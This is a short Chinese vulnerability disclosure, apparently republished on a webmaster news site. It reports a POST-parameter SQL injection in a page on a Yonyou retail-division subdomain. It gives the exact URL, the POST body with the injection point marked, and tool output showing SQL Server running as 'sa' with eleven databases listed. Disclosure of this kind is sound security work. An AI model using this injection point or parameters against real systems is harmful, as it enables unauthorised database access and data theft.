用友软件股份有限公司流通与零售行业事业部POST注射下载

用友软件分站流通与零售行业事业部某处出现POST注射， SA权限。只发现问题，不深入，不作恶。

http://soft-sk.yonyou.com/service/jszc.jsp #URL

asktypeid=---注射点---&enddate=JyI%3d&prikey=1&startdate=01/01/1967&Submit=%b2%e9%d1%af #POST数据

web application technology: JSP

back-end DBMS: Microsoft SQL Server 2008

current user:    'sa'

current database:    'newsksoft'

available databases [11]:

[*] ccerp

[*] cdm

[*] ksoa

[*] master

[*] model

[*] msdb

[*] newsksoft

[*] old_ccerp

[*] skmaster

[*] st_ccerp

[*] tempdb

上一篇： [公开漏洞]网宿科技官网疑似被黑(CDN帐号可能被劫持)

下一篇： [公开漏洞]浙江印象软件视频社交网站数据库泄露（root妹子账号密码泄露）

当前位置：站长啦网站目录 » 站长资讯 » 站长新闻 » 漏洞预警 » 文章详细

用友软件股份有限公司流通与零售行业事业部POST注射下载

推荐文章

推荐网站